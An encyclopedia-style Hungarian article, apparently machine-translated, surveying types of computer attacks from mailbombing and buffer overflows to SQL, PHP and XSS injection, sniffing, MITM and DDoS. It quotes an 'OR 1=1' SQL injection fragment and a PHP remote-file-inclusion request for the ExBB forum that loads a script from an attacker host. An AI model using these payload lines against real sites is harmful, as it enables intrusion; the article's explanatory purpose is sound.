Hacker támadás

Az oldal jelenlegi verzióját még nem ellenőrizték tapasztalt hozzászólók, és jelentősen eltérhet a 2017. október 14-én felülvizsgált verziótól ; az ellenőrzések 20 szerkesztést igényelnek .

Hacker támadás a szó szűk értelmében - jelenleg a kifejezés "támadás egy biztonsági rendszer ellen", és inkább a következő kifejezés jelentésére utal Cracker attack . Ennek oka maga a " hacker " szó jelentésének félrevezetése volt .

A hackertámadás a szó tág értelmében (eredeti jelentése) egy ötletbörze, amelynek célja, hogy megtalálja a módját az összetett problémák megoldásának. Egy vagy több kiváló szakember ( hacker ) részt vehet egy hackertámadásban. A brainstorming eredményeként a probléma megoldására nem szokványos módszereket lehet kitalálni, vagy a meglévő módszereket optimalizálni lehet.

A cracker támadás  egy távoli/helyi számítástechnikai rendszer feletti irányítás megszerzése (jogok megszerzése), destabilizálása vagy szolgáltatásmegtagadása.

Mailbombing ( SMTP )

Ezt tartják a legrégebbi támadási módszernek, bár lényege egyszerű és primitív: a sok e-mail üzenet lehetetlenné teszi a postafiókokkal, sőt néha a teljes levelezőszerverekkel való munkát . Számos programot fejlesztettek ki erre a célra, és még egy tapasztalatlan felhasználó is végrehajthat támadást az áldozat e-mail-címének , az üzenet szövegének és a szükséges üzenetek számának megadásával. Sok ilyen program lehetővé tette a feladó valós IP-címének elrejtését egy névtelen levelezőszerver segítségével a levelezéshez . Ezt a támadást nehéz megakadályozni, mivel még az internetszolgáltató levélszűrői sem tudják meghatározni a valódi spam küldőt . A szolgáltató korlátozhatja az egyetlen feladótól érkező e-mailek számát, de a feladó címét és tárgyát gyakran véletlenszerűen generálják .

Puffer túlcsordulás

Talán az egyik leggyakoribb típusú támadás az interneten. Ennek a támadásnak az elve olyan szoftverhibák használatán alapul, amelyek lehetővé teszik a memória megsértését és az alkalmazás összeomlását vagy tetszőleges bináris kód futtatását annak a felhasználónak a nevében, amelyen a sérülékeny program fut. Ha a program rendszergazdai fiók alatt fut, akkor ez a támadás lehetővé teszi, hogy teljes irányítást szerezzen az áldozat számítógépe felett, ezért ajánlott egy közönséges felhasználó fiókja alatt dolgozni, aki korlátozott jogokkal rendelkezik a rendszeren, és csak olyan műveleteket hajthat végre, amelyekre szükség van. rendszergazdai fiók alatti adminisztrátori jogok.

Vírusok , trójaiak , férgek , snifferek , rootkitek és egyéb speciális programok

A következő típusú támadás a minősített információkhoz való hozzáférés kifinomultabb módja - speciális programok használata az áldozat számítógépén való munkához, valamint további terjesztés (ezek vírusok és férgek). Az ilyen programokat arra tervezték, hogy titkos információkat keressenek és továbbítsanak tulajdonosuknak, vagy egyszerűen csak károsítsák a biztonsági rendszert és az áldozat számítógépének teljesítményét. Ezeknek a programoknak a működési elvei eltérőek.

Hálózati intelligencia

Egy ilyen támadás során a cracker valójában nem hajt végre pusztító műveleteket, de ennek eredményeként bizalmas információkat szerezhet az áldozat számítástechnikai rendszerének felépítéséről és működési elveiről. A megszerzett információk felhasználhatók a közelgő támadás kompetens felépítésére, és általában az előkészítő szakaszban történik.

Az ilyen felderítés során a támadó végrehajthat portellenőrzést , DNS - lekérdezéseket , nyitott portok pingelését , proxyszerverek jelenlétét és biztonságát . Ennek eredményeként információt kaphat a rendszerben meglévő DNS-címekről, kinek a tulajdonosa, milyen szolgáltatások érhetők el rajtuk, ezekhez a szolgáltatásokhoz milyen szintű hozzáférést kapnak külső és belső felhasználók.

Csomagszippantás

Ez is egy meglehetősen gyakori típusú támadás, amely a hálózati kártya promiszkuális módban történő működésén , valamint a Wi-Fi hálózatok monitorozásán alapul . Ebben az üzemmódban a hálózati kártya által fogadott összes csomag feldolgozásra kerül egy speciális, a sniffer nevű alkalmazásba . Ennek eredményeként a támadó nagy mennyiségű szolgáltatási információhoz juthat: ki, honnan és hová továbbította a csomagokat, milyen címeken haladtak át ezek a csomagok. Az ilyen támadások legnagyobb veszélye magának az információnak, például az alkalmazottak bejelentkezési adatainak és jelszavainak a megszerzése, amelyek segítségével a vállalat egy hétköznapi alkalmazottja leple alatt illegálisan beléphetnek a rendszerbe.

IP-hamisítás

Szintén gyakori támadástípus a nem megfelelően védett hálózatokban, amikor a támadó jogosult felhasználónak adja ki magát, magán a szervezeten belül vagy azon kívül. Ehhez a crackernek olyan IP-címet kell használnia, amely engedélyezett a hálózati biztonsági rendszerben. Ilyen támadás akkor lehetséges, ha a biztonsági rendszer csak IP-cím alapján teszi lehetővé a felhasználó azonosítását, és nem igényel további megerősítéseket.

Man-in-the-Middle

A támadás olyan típusa, amikor a támadó elfogja a két rendszer közötti kommunikációs csatornát , és hozzáfér az összes továbbított információhoz. Amikor ezen a szinten hozzáfér, a támadó módosíthatja az információt a céljai eléréséhez szükséges módon. Az ilyen támadások célja a továbbított információk illegális megszerzése, ellopása vagy meghamisítása , illetve a hálózati erőforrásokhoz való jogosulatlan hozzáférés . Az ilyen támadásokat rendkívül nehéz nyomon követni, mivel a támadó általában a szervezeten belül található.

Kódbefecskendezés

A támadások családja, amelyet egyetlen közös elv egyesít - a támadás eredményeként az adatok kódként futnak le.

Az SQL-injektálás  olyan támadás, amelynek soránaz adatbázisba irányuló SQL -lekérdezések paraméterei megváltoznak. Ennek eredményeként a kérés egészen más értelmet nyer, és a bemeneti adatok elégtelen szűrése esetén nem csak bizalmas információkat tud megjeleníteni, hanem módosítani/törölni is tudja az adatokat. Nagyon gyakran ez a fajta támadás figyelhető meg olyan webhelyek példáján, amelyek parancssori paramétereket (jelen esetben URL -változókat ) használnak az adatbázisok SQL-lekérdezései megfelelő érvényesítés nélkül való felépítéséhez [1] .

SELECT mezőlista FROM táblából WHERE id = 23 VAGY 1=1;Ellenőrzés helyett helyettesíthet egy olyan állítást
, amely ha igaz , lehetővé teszi az ellenőrzés megkerülését

A PHP injekció a PHP -n futó webhelyek  feltörésének egyik módja. Ez abból áll, hogy egy speciálisan kialakított rosszindulatú szkriptet fecskendeznek be a webalkalmazás kódjába a webhely szerver oldalán, ami tetszőleges parancsok végrehajtásához vezet. Ismeretes, hogy számos, az interneten elterjedt PHP-n futó ingyenes motor és fórum (leggyakrabban elavult verziók) rosszul kigondolt modulokkal vagy különálló struktúrákkal rendelkezik, amelyek sebezhetőséget tartalmaznak. A feltörők az ilyen sérülékenységeket nem megtisztított változókként elemzik, amelyek külső értékeket kapnak. Például a régi ExBB fórum biztonsági rését a hackerek a következő kéréssel használják ki: GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.

A Cross Site Scripting vagy XSS ( rövidítés az angol  Cross Site Scripting szóból , nem tévesztendő össze a CSS -sel ( Cascade Style Sheet )) a webalkalmazásokban gyakran előforduló sebezhetőség, amely lehetővé teszi a rosszindulatú felhasználók számára, hogy kódot fecskendezzenek be más felhasználók által megtekintett weboldalakra. . Ilyen kód például a HTML kód és a kliensoldali szkriptek, leggyakrabban a JavaScript .

Az XPath injekció  egyfajta biztonsági rés, amely XPath kifejezések beillesztését jelenti az XML - adatbázis eredeti kérésébe . Más típusú injekciókhoz hasonlóan a sérülékenység a bemeneti adatok elégtelen ellenőrzése miatt lehetséges.

Az Autofill  a trójaiak elvén működő webinjekció, melynek fő célja, hogy beszivárogjon a felhasználó számlájára a fizetési rendszerben , a HTML kód módosításával észrevétlenül megváltoztassa a tranzakciós adatokat,és átutalja a felhasználó pénzét a támadó számlájára.

Social engineering

Social engineering (az angol  social engineering szóból ) – a személyzet inkompetenciájának, alkalmatlanságának vagy hanyagságának felhasználása információkhoz való hozzáférés érdekében. Ezt a módszert általában számítógép nélkül, normál telefon vagy levél használatával alkalmazzák. Ily módon általában sokféle információhoz jutunk. Az ilyen támadás során a támadó kapcsolatot létesít az áldozattal, és félrevezetve, bizalmat szerezve megpróbálja megszerezni a szükséges információkat, amelyek más módon nehezen, vagy más módon kockázatosabbak.

Szolgáltatásmegtagadás

DoS (az angol.  Denial of Service  - Denial of Service) - egy támadás, amelynek célja, hogy a szerver ne válaszoljon a kérésekre. Ez a fajta támadás nem jár bizonyos titkos információk megszerzésével, de néha segítséget jelent más támadások inicializálásában. Például egyes programok a kódjuk hibái miatt kivételeket okozhatnak , és a szolgáltatások letiltásakor végrehajthatják a támadó által biztosított kódot, vagy árvízi támadásokat hajthatnak végre, amikor a kiszolgáló nem tud nagy számú bejövő csomagot feldolgozni.

A DDoS (az angol  Distributed Denial of Service  - Distributed DoS szóból) a DoS támadás egy altípusa, amelynek célja ugyanaz, mint a DoS, de nem egy számítógépről, hanem a hálózat több számítógépéről készül. Az ilyen típusú támadások vagy a szolgáltatás megtagadásához vezető hibák előfordulását, vagy a védelem működését használják fel, ami a szolgáltatás működésének blokkolásához, és ennek következtében szolgáltatásmegtagadáshoz vezet. A DDoS-t ott használják, ahol a szokásos DoS nem hatékony. Ehhez több számítógépet kombinálnak, és mindegyik DoS támadást hajt végre az áldozat rendszerén. Ezt együtt DDoS-támadásnak nevezik. Egy botnet mérete több tíztől több százezer számítógépig terjedhet.

Bármilyen támadás nem más, mint kísérlet arra, hogy az áldozat biztonsági rendszerének tökéletlenségét akár információszerzésre, akár a rendszer károsodására használják fel, ezért minden sikeres támadás oka a feltörő szakszerűsége és az információ értéke, valamint a biztonsági rendszeradminisztrátor kompetenciájának hiánya , különösen a szoftver tökéletlensége és a biztonsági kérdésekre való elégtelen figyelem a vállalat egészében.

Lásd még

Jegyzetek

  1. SQL-injekciós támadások példa szerint archiválva : 2015. november 7. a Wayback Machine -nél 

Linkek